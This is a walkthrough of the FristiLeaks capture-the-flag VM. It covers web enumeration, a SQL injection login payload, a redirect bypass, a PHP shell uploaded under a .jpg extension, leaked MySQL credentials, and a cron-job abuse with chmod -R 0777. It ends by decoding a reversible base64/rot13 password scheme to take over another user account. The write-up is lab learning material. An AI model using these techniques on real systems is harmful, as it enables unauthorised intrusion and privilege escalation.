Cool, there is a web server running on the default HTTP port. Browsing to port 80 brought up this page.

Finding Clues

Interesting, but this page didn’t have anything special, so I checked its source code. There was a comment:

PHP

<!--
Welcome to #Fristleaks, a quick hackme VM by @Ar0xA Goal: get UID 0 (root) and
read the special flag file. Timeframe: should be doable in 4 hours.
-->

But it was not what I was looking for. I then followed the source of the image on the homepage, which led me to the images directory. It contained two images:

3037440.jpg
keep-calm.png

I could see where keep-calm was being used. But what about the other image?

To find my answer, I started looking for a place where this image was actually being used.

Robots.txt

I checked for a robots.txt file, and luckily it was there.

robots.txt

User-agent: *
Disallow: /cola
Disallow: /sisi
Disallow: /beer

All these directories contained nothing other than that image. Disappointment! But I knew there was something about these URLs: they are all names of drinks. And the keep-calm image says

Keep calm and drink Fristi

Drink Fristi? A drink? Just like beer, Sisi and Cola?

It clicked, and I tried this URL:

192.168.0.102/fristi/

And voila! I found a login panel here.

Fristi Login panel

This admin portal brought up a whole new challenge. I had to bypass this authentication somehow. I tried SQL injection authentication bypass payloads like

' or '1'='1

and the like, but the login script was sanitizing input properly, so no luck with SQL injection. After a few failed attempts, I moved on to try something else.

Sometimes, due to poor session management, it is possible to access private files without authentication. For example, admin/dashboard.php is meant for admins, and a visitor without a session is redirected to the login form automatically. However, if the script only sends the redirect and does not stop rendering the page, we can block that redirect in the browser and see the content of dashboard.php.

Bypass Attempt – Blocking HTTP Redirect

Before using this method, I had to know the actual admin file names. So I started guessing common file names like

dashboard.php

admin.php

home.php

loggedin.php

upload.php

submit.php

And I found one: upload.php existed, but it redirected me back to main_login.php. So I fired up Firefox, installed the NoRedirect add-on, added a no-redirect rule for main_login.php, browsed to upload.php again, and voila! I was presented with a file upload form.

Bypassing Admin Area

Awesome. But the sad part was that I couldn’t upload a PHP shell, as the upload script accepted only files with image extensions. After a few failed attempts, I gave up and went looking for a proper login session.

Bypass Attempt – Using Clues

Before using that redirect blocker, I had also found some useful information in the source code. There was a commented-out text in the login page source.

User comment found in login page

PHP

<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->

eezeepz?

Yeah, right. I know what you’re thinking. A possible username? I thought that if a username is given here, it’s quite possible that the password is also hidden somewhere, waiting to be found. So I kept reading the source code, looking for clues. I noticed the image displayed on the login form was stored as a base64 data string. And right after this image there was another base64 string, but it was commented out.

It was just another file. To keep things moving, I fired up Firebug, replaced the login page image source with this string, and the result was something like

Grabbing Password

The resulting image gave me this string:

password

keKkeKKeKKeKkEkkEk

No wonder: that was our password. Having both username and password, I made a login attempt and was redirected to login_success.php.

Super! But I was disappointed. I thought there would be more modules available if I logged in with a proper session, but nothing new was found. Just the same old upload module to which I already had access.

Now I was sure that if there was a way in, it was through upload.php. I added another extension, “jpg”, to the shell, uploaded it, accessed it, and voila! A lovely shell was waiting for me to take control of the server.

Take Over!

I found MySQL credentials in the checklogin.php file:

MySQL Credentials

PHP

$host="localhost"; // Host name
$username="eezeepz"; // Mysql username
$password="4ll3maal12#"; // Mysql password
$db_name="hackmenow"; // Database name
$tbl_name="members"; // Table name

Inspecting database

After logging in to the MySQL server with the given credentials, I could only find a single table, “members”, with only one record, which I already knew. No surprises there.

Gathering more clues

I started a reverse shell on the server for better command results. While going through different directories, I came across an interesting file, “notes.txt”, in the /home/eezeepz/ directory.

Shell

ls /home
admin
eezeepz
fristigod
ls /home/firstigod
ls: cannot access /home/firstigod: No such file or directory
ls /home/fristigod
ls: cannot open directory /home/fristigod: Permission denied
ls /home/admin
ls: cannot open directory /home/admin: Permission denied
ls /home/eezeepz
MAKEDEV
cbq
cciss_id
cfdisk
chcpu
chgrp
chkconfig
chmod
chown
clock
consoletype
cpio
cryptsetup
ctrlaltdel
cut
halt
hostname
hwclock
kbd_mode
kill
killall5
kpartx
nameif
nano
netreport
netstat
new-kernel-pkg
nice
nisdomainname
nologin
notes.txt
tar
taskset
tc
telinit
touch
tracepath
tracepath6
true
tune2fs
weak-modules
wipefs
xfs_repair
ypdomainname
zcat
zic

All other files were either useless or not accessible with current rights.

notes.txt

Yo EZ,

I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry

Wow! Seriously? Let’s do something with your given rights b***h 😎

Taking down Admin Home

As instructed, I created the runthis file in /tmp with the following command:

Shell

echo /home/admin/chmod -R 0777 /home/admin >> /tmp/runthis

And after some time, the cronresult file was there:

cronresult

Shell

executing: /home/admin/chmod -R 0777 /home/admin

Amazingly, I could then access the /home/admin directory with my current user. The admin user had some very interesting files there: cryptedpass.txt, whoisyourgodnow.txt and cryptpass.py. I believed cryptedpass.txt was ciphertext generated by the cryptpass.py script, so I looked into the script.

cryptpass.py

Python

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    # base64-encode the input, reverse the result, then apply rot13
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

I moved on to test it.

testing

Shell

python /home/admin/cryptpass.py HelloWorld!
=RPMfW3oK9TofITF

Cool, it generated an encoded password for me. However, the script uses only rot13 and base64, and both are reversible encodings rather than encryption, so all I had to do was apply the steps in reverse order, which was easy. I modified the original script as follows:

decrypt.py

Python

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def decodePass(str):
    # undo the steps in reverse order: rot13, un-reverse, then base64-decode
    rot13str = codecs.decode(str[::-1], 'rot13')
    return base64.b64decode(rot13str)

print decodePass(sys.argv[1])

And to test whether it worked:

Testing Decryption

Shell

python /home/admin/cryptpass.py helloWorld!
=RPMfW3oK9TofITn
python /home/decrypt.py =RPMfW3oK9TofITn
python: can't open file '/home/decrypt.py': [Errno 2] No such file or directory
python /home/admin/decrypt.py =RPMfW3oK9TofITn
helloWorld!

Awesome! Everything was in order. Now it was time to decode the other passwords and try su.
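The cryptpass.py scheme again, reimplemented in Python 3 as an added example (not code from the VM or from this post): the encode/decode pair shows that it is keyless and fully reversible, and beside it is what a stored password should look like instead, a salted PBKDF2 hash that can only be verified, never decoded. The iteration count and the "algo$rounds$salt$digest" storage layout are my own assumptions.

```python
import base64
import codecs
import hashlib
import hmac
import os

# The VM's cryptpass.py scheme ported to Python 3: base64, reverse, rot13.
# No key is involved, so anyone holding the script can undo it exactly.
def encode_string(plain: str) -> str:
    b64 = base64.b64encode(plain.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")

def decode_pass(obfuscated: str) -> str:
    b64 = codecs.decode(obfuscated[::-1], "rot13")
    return base64.b64decode(b64).decode()

# What a stored credential should look like instead: a random salt plus a
# slow one-way KDF. Only verification exists; there is no decode function.
PBKDF2_ROUNDS = 600_000           # assumption: iteration count chosen here
STORAGE_FORMAT = "pbkdf2_sha256"  # assumption: my own algo$rounds$salt$digest layout

def hash_password(plain: str, salt: bytes = b"") -> str:
    salt = salt or os.urandom(16)  # fresh salt unless one is supplied for tests
    digest = hashlib.pbkdf2_hmac("sha256", plain.encode(), salt, PBKDF2_ROUNDS)
    return f"{STORAGE_FORMAT}${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"

def verify_password(plain: str, stored: str) -> bool:
    algo, rounds, salt_hex, digest_hex = stored.split("$")
    if algo != STORAGE_FORMAT:
        return False
    digest = hashlib.pbkdf2_hmac("sha256", plain.encode(),
                                 bytes.fromhex(salt_hex), int(rounds))
    # constant-time comparison so timing does not leak how many bytes matched
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))

if __name__ == "__main__":
    # Values from the walkthrough: the "cipher" round-trips with no secret at all.
    print(encode_string("HelloWorld!"))           # =RPMfW3oK9TofITF
    print(decode_pass("mVGZ3O3omkJLmy2pcuTq"))    # thisisalsopw123
    stored = hash_password("thisisalsopw123")
    print(stored)
    print(verify_password("thisisalsopw123", stored), verify_password("nope", stored))
```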

Decrypting passwords

sh-4.1$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
sh-4.1$ python decrypt.py mVGZ3O3omkJLmy2pcuTq
python decrypt.py mVGZ3O3omkJLmy2pcuTq
thisisalsopw123
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
sh-4.1$ python decrypt.py =RFn0AKnlMHMPIzpyuTI0ITG
python decrypt.py =RFn0AKnlMHMPIzpyuTI0ITG
LetThereBeFristi!
sh-4.1$

And after trying these passwords on the different users, I was able to log in as the fristigod user.